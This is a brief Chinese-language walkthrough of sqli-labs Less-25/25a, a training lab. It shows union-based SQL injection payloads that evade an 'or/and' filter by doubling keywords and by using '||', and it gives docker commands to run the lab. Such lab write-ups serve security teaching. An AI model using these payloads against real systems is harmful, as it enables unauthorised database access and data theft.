Less25，25a【and/or过滤】

网页提示对'or' & 'and' 过滤，注入时可以通过将关键字夹杂在字符串中绕过过滤，如下

绕过方式1：双写绕过

127.0.0.1/sqli-labs/Less-25/?id=-1%27%20union%20select%201,2,3%20anandd%201=%271#

绕过方式2：使用|| 替代 or

?id=-1' union select 1,@@version,3 || 1='1#

 

 

    

之后对select 1,2进行注入，这里用and 1='1#进行了闭合，也可以直接在select1，2，后面闭合。在注入语句中不使用or/and

/?id=-1' union select 1,2,1='1#

 

25a与25不同在于闭合符号，25a没有闭合符号直接使用联合注入或延时注入即可，25a与25还有一点在报错上25a不存在报错信息

 

注:25之后sql-labs安装在docker上，windows对部分符号转义存在bug

搜索sqli-labs：docker search sqli-labs

建立镜像：docker pull acgpiano/sql-labs

查看存在镜像：docker images

运行存在镜像：docker run -dt --name crow-sqli-labs -p 666:80 --rm acgpiano/sqli-labs

-dt 后台运行 --name 命名 -p 端口映射 -rm退出后自动清理容器内部